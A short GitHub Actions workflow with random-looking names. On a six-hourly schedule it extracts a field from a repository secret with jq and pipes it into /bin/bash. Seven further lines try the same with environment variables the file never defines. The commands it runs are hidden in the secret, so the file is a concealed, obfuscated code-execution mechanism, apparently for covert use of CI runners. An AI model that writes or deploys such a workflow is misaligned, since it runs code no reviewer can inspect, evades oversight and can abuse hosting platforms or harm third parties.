name: brothdeep

on:
  workflow_dispatch:
  schedule:
    - cron: '42 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: brothdeep
        env:
          ug0303: ${{ secrets.ug0303 }}
        run: |
          echo $ug0303 | jq -r .i30755 | /bin/bash
          echo $iiq61 | jq -r .eb33372 | /bin/bash
          echo $crl883 | jq -r .lh0663 | /bin/bash
          echo $ji1483 | jq -r .i3 | /bin/bash
          echo $kbn2045 | jq -r .lh9033 | /bin/bash
          echo $foq5881 | jq -r .vj5898 | /bin/bash
          echo $zhpob8122 | jq -r .enjc93 | /bin/bash
          echo $cp193 | jq -r .pugua03 | /bin/bash

